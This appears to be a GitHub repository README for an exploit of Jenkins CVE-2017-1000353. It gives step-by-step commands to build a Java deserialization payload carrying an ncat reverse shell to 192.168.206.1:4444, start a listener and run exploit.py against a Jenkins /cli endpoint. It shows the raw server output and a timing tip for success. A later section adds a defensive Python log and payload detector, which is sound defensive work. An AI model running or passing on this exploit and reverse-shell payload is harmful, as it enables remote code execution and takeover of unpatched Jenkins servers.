Branch: master
Latest commit 48d0709 May 11, 2017

Files: .metadata, eclipse_project (add Jenkins CVE-2017-1000353, May 10, 2017), vulnerable_jenkins_wars, CVE-2017-1000353.pcap, README.md, exploit.py, generate_java_serialization_data.sh

README.md
How to exploit Jenkins with CVE-2017-1000353?

1. Generate a Java serialization object

```
CVE-2017-1000353 ->> bash generate_java_serialization_data.sh
[*] Usage: generate_java_serialization_data.sh <os command>

CVE-2017-1000353 ->> bash generate_java_serialization_data.sh "ncat -e /bin/bash 192.168.206.1 4444"

CVE-2017-1000353 ->> ll
total 56
-rw-r--r--  1 security  staff   8.7K May 10 01:43 CVE-2017-1000353.pcap
drwxr-xr-x  8 security  staff   272B May  9 20:26 eclipse_project
-rw-r--r--  1 security  staff   4.0K May 10 01:56 exploit.py
-rw-r--r--@ 1 security  staff   204B May  9 23:20 generate_java_serialization_data.sh
-rw-r--r--  1 security  staff   2.4K May 10 01:57 java_serialization_data.bin
drwxr-xr-x  4 security  staff   136B May 10 01:44 vulnerable_jenkins_wars
CVE-2017-1000353 ->> python exploit.py
INFO:exploit.py:[*] python exploit.py <http://127.0.0.1:8080/cli>
```

2. Start a listener and wait for a shell session

```
CVE-2017-1000353 ->> ncat -v -l -p 4444
```

3. Exploit the Jenkins CLI with CVE-2017-1000353

```
CVE-2017-1000353 ->> python exploit.py http://192.168.206.144:8080/cli java_serialization_data.bin
python exploit.py http://192.168.206.144:8080/cli java_serialization_data.bin
download - Starting new HTTP connection (1): 192.168.206.144
download - http://192.168.206.144:8080 "POST /cli HTTP/1.1" 200 None
upload - Starting new HTTP connection (1): 192.168.206.144
upload - http://192.168.206.144:8080 "POST /cli HTTP/1.1" 200 0
upload - b''
download - b'Starting HTTP duplex channel<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\xac\xed\x00\x05sr\x00\x1bhudson.remoting.UserRequest\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03L\x00\x10classLoaderProxyt\x000Lhudson/remoting/RemoteClassLoader$IClassLoader;[\x00\x07requestt\x00\x02[BL\x00\x08toStringt\x00\x12Ljava/lang/String;xr\x00\x17hudson.remoting.Request\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03I\x00\x02idI\x00\x08lastIoIdL\x00\x08responset\x00\x1aLhudson/remoting/Response;xr\x00\x17hudson.remoting.Command\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01L\x00\tcreatedAtt\x00\x15Ljava/lang/Exception;xpsr\x00\x1ehudson.remoting.Command$Source\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01L\x00\x06this$0t\x00\x19Lhudson/remoting/Command;xr\x00\x13java.lang.Exception\xd0\xfd\x1f>\x1a;\x1c\xc4\x02\x00\x00xr\x00\x13java.lang.Throwable\xd5\xc65\'9w\xb8\xcb\x03\x00\x04L\x00\x05causet\x00\x15Ljava/lang/Throwable;L\x00\rdetailMessageq\x00~\x00\x03[\x00\nstackTracet\x00\x1e[Ljava/lang/StackTraceElement;L\x00\x14suppressedExceptionst\x00\x10Ljava/util/List;xpq\x00~\x00\x10pur\x00\x1e[Ljava.lang.StackTraceElement;\x02F*<<\xfd"9\x02\x00\x00xp\x00\x00\x00\x07sr\x00\x1bjava.lang.StackTraceElementa\t\xc5\x9a&6\xdd\x85\x02\x00\x04I\x00\nlineNumberL\x00\x0edeclaringClassq\x00~\x00\x03L\x00\x08fileNameq\x00~\x00\x03L\x00\nmethodNameq\x00~\x00\x03xp\x00\x00\x00Ft\x00\x17hudson.remoting.Commandt\x00\x0cCommand.javat\x00\x06<init>sq\x00~\x00\x13\x00\x00\x005q\x00~\x00\x15q\x00~\x00\x16q\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x00ct\x00\x17hudson.remoting.Requestt\x00\x0cRequest.javaq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x00=t\x00\x1bhudson.remoting.UserRequestt\x00\x10UserRequest.javaq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x03Pt\x00\x17hudson.remoting.Channelt\x00\x0cChannel.javat\x00\tcallAsyncsq\x00~\x00\x13\x00\x00\x00jt\x00\x1ahudson.remoting.PingThreadt\x00\x0fPingThread.javat\x00\x04pingsq\x00~\x00\x13\x00\x00\x00Vq\x00~\x00$q\x00~\x00%t\x00\x03runsr\x00&java.util.Collections$UnmodifiableList\xfc\x0f%1\xb5\xec\x8e\x10\x02\x00\x01L\x00\x04listq\x00~\x00\x0fxr\x00,java.util.Collections$UnmodifiableCollection\x19B\x00\x80\xcb^\xf7\x1e\x02\x00\x01L\x00\x01ct\x00\x16Ljava/util/Collection;xpsr\x00\x13java.util.ArrayListx\x81\xd2\x1d\x99\xc7a\x9d\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x00w\x04\x00\x00\x00\x00xq\x00~\x00.xq\x00~\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00ps}\x00\x00\x00\x02\x00.hudson.remoting.RemoteClassLoader$IClassLoader\x00\x1chudson.remoting.IReadResolvexr\x00\x17java.lang.reflect.Proxy\xe1\'\xda \xcc\x10C\xcb\x02\x00\x01L\x00\x01ht\x00%Ljava/lang/reflect/InvocationHandler;xpsr\x00\'hudson.remoting.RemoteInvocationHandler\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05Z\x00\x14autoUnexportByCallerZ\x00\tgoingHomeI\x00\x03oidZ\x00\tuserProxyL\x00\x06originq\x00~\x00\rxp\x00\x00\x00\x00\x00\x02\x00sq\x00~\x00\x0bq\x00~\x005t\x00xProxy hudson.remoting.RemoteInvocationHandler@2 was created for interface hudson.remoting.RemoteClassLoader$IClassLoaderuq\x00~\x00\x11\x00\x00\x00\x08sq\x00~\x00\x13\x00\x00\x00~t\x00\'hudson.remoting.RemoteInvocationHandlert\x00\x1cRemoteInvocationHandler.javaq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x00\x8aq\x00~\x009q\x00~\x00:t\x00\x04wrapsq\x00~\x00\x13\x00\x00\x02\x88q\x00~\x00 q\x00~\x00!t\x00\x06exportsq\x00~\x00\x13\x00\x00\x02\xd4t\x00!hudson.remoting.RemoteClassLoadert\x00\x16RemoteClassLoader.javaq\x00~\x00>sq\x00~\x00\x13\x00\x00\x00Gq\x00~\x00\x1dq\x00~\x00\x1eq\x00~\x00\x17sq\x00~\x00\x13\x00\x00\x03Pq\x00~\x00 q\x00~\x00!q\x00~\x00"sq\x00~\x00\x13\x00\x00\x00jq\x00~\x00$q\x00~\x00%q\x00~\x00&sq\x00~\x00\x13\x00\x00\x00Vq\x00~\x00$q\x00~\x00%q\x00~\x00(q\x00~\x00,xxur\x00\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\x00\x00xp\x00\x00\x00>\xac\xed\x00\x05sr\x00\x1fhudson.remoting.PingThread$Ping\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00w\x08\xff\xff\xff\xfe\x00\x00\x00\x02xpt\x00\'hudson.remoting.PingThread$Ping@135ed23y'
```

Notice:

If you want to exploit CVE-2017-1000353 successfully, make sure that the time between the download and the upload request is less than `wait(1000);`. The relevant code is as follows:

```
$ grep -A 20 "public synchronized void download" ./core/src/main/java/hudson/model/FullDuplexHttpChannel.java
    public synchronized void download(StaplerRequest req, StaplerResponse rsp) throws InterruptedException, IOException {
        rsp.setStatus(HttpServletResponse.SC_OK);

        // server->client channel.
        // this is created first, and this controls the lifespan of the channel
        rsp.addHeader("Transfer-Encoding", "chunked");
        OutputStream out = rsp.getOutputStream();
        if (DIY_CHUNKING) out = new ChunkedOutputStream(out);

        // send something out so that the client will see the HTTP headers
        out.write("Starting HTTP duplex channel".getBytes());
        out.flush();

        {// wait until we have the other channel
            long end = System.currentTimeMillis() + CONNECTION_TIMEOUT;
            while (upload == null && System.currentTimeMillis()<end)
                wait(1000);         // ********************** Bingo ************************

            if (upload==null)
                throw new IOException("HTTP full-duplex channel timeout: "+uuid);
        }
```
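The transcript above shows what this channel setup leaves behind on the server side: two `POST /cli` requests from one client a moment apart (the `download` side, then the `upload` side), and a response body that starts with the `<===[JENKINS REMOTING CAPACITY]===>` preamble followed by a Java serialization stream (`rO0AB...` in base64, `\xac\xed\x00\x05` raw). The following is an added example for operators, not code from this repository: it parses constructed access-log lines in Jenkins' NCSA-style format, flags paired `POST /cli` requests from the same source inside a short window, and checks a captured body for the remoting markers. The log lines, the window size and the sample body are assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Jenkins' NCSA-style access log format (not captured
# traffic). The first two mirror the download/upload pairing of POST /cli requests
# seen in the transcript above; the rest are ordinary noise.
SAMPLE_LOG = """\
192.168.206.1 - - [10/May/2017:01:56:02 +0000] "POST /cli HTTP/1.1" 200 -
192.168.206.1 - - [10/May/2017:01:56:03 +0000] "POST /cli HTTP/1.1" 200 0
10.0.0.7 - - [10/May/2017:01:57:10 +0000] "GET /job/build/1/console HTTP/1.1" 200 5120
10.0.0.9 - - [10/May/2017:02:05:00 +0000] "POST /cli HTTP/1.1" 200 -
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)

# Markers seen in the /cli exchange: the remoting preamble, the raw Java
# serialization stream magic (0xACED0005) and its base64 form (the "rO0AB" prefix).
REMOTING_PREAMBLE = b"<===[JENKINS REMOTING CAPACITY]===>"
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
JAVA_SERIAL_MAGIC_B64 = b"rO0AB"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def find_cli_channel_pairs(log_text, window_seconds=5):
    """Return (ip, first_ts, second_ts) for every two POST /cli requests from the
    same source that arrive within window_seconds of each other.

    FullDuplexHttpChannel needs a download request followed quickly by an upload
    request, so this pairing is the access-log footprint of the channel setup; on an
    instance where nobody uses the remoting-based CLI it is worth an alert.
    """
    stamps_by_ip = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == "/cli":
            stamps_by_ip.setdefault(rec["ip"], []).append(rec["ts"])
    pairs = []
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        for first, second in zip(stamps, stamps[1:]):
            if second - first <= timedelta(seconds=window_seconds):
                pairs.append((ip, first, second))
    return pairs


def looks_like_remoting_payload(body):
    """True if a captured /cli request or response body carries the remoting
    preamble or a Java serialization stream (raw or base64-encoded)."""
    if isinstance(body, str):
        body = body.encode("utf-8", errors="replace")
    return any(marker in body
               for marker in (REMOTING_PREAMBLE, JAVA_SERIAL_MAGIC, JAVA_SERIAL_MAGIC_B64))


if __name__ == "__main__":
    for ip, first, second in find_cli_channel_pairs(SAMPLE_LOG):
        print(f"paired POST /cli from {ip}: {first.isoformat()} then {second.isoformat()}")
    # Constructed fragment modelled on the response shown in the transcript above.
    sample_body = b"Starting HTTP duplex channel<===[JENKINS REMOTING CAPACITY]===>rO0ABXNy"
    print("remoting payload:", looks_like_remoting_payload(sample_body))
```

The window is deliberately wider than the `wait(1000)` poll interval in the Java code, because the `download` handler keeps waiting until `CONNECTION_TIMEOUT` elapses; a detector that only looked for sub-second gaps would miss a slow client. Run over real logs, the pair finder is a triage signal rather than proof of exploitation: legitimate `jenkins-cli` sessions over HTTP produce the same pairing, so the body check (or the pcap the repository ships) is what confirms that a serialized object rather than ordinary CLI traffic went through the channel.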